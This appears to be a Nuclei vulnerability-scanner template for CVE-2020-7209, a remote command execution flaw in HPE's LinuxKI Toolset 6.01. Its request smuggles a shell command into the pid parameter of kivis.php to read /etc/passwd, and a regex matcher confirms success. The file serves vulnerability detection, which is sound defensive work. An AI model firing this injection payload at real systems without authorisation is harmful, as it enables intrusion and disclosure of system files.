nuclei-templates/cves/CVE-2020-7209.yaml

26 lines
838 B
YAML
Raw Normal View History

id: cve-2020-7209
info:
name: LinuxKI Toolset 6.01 Remote Command Execution
author: dwisiswant0
severity: critical
# This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
# The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability.
2020-07-07 19:55:24 +00:00
# https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78
2020-09-01 13:08:31 +00:00
# venedor: https://www.hpe.com/us/en/home.html
# softwar: https://github.com/HewlettPackard/LinuxKI
requests:
- method: GET
path:
2020-09-01 13:08:31 +00:00
- "{{BaseURL}}/linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;"
matchers-condition: and
matchers:
2020-09-01 13:08:31 +00:00
- type: regex
regex:
- "root:[x*]:0:0:"
part: body